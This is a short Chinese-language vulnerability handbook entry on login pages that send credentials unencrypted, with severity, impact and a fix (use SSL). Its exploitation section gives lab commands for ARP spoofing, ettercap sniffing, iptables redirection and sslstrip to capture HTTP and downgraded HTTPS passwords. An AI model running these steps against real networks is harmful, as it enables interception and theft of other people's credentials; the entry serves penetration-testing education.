1.11 未加密登陆请求漏洞
1.11 未加密登陆请求漏洞
漏洞描述
网站对用户登录认证信息未进行加密,敏感信息以明文形式进行传送,易在传输过程中被获取。
漏洞等级
中危
漏洞危害
易造成用户敏感信息泄露与篡改。
漏洞利用
实验环境
kali:192.168.0.105 受害机:192.168.0.106
实战抓取http密码
开启流量转发
echo 1 > /proc/sys/net/ipv4/ip_forward
进行arp欺骗
开启监听
ettercap -Tq -i eth0
目标机登录账户密码
kali返回账户密码
实战抓取https密码
1、root@kali:~# arpspoof -i eth0 -t 10.10.10.129 10.10.10.2
2、更改Sslstrip 配置文件
vim /etc/ettercap/etter.conf
if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
将这两行的注释去掉如下:
if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
3、root@kali:~# sslstrip -a -f -k
4、root@kali:~# ettercap -Tq -i eth0
漏洞修复
建议通过加密连接(如SSL)方式进行敏感信息的传送。
Last updated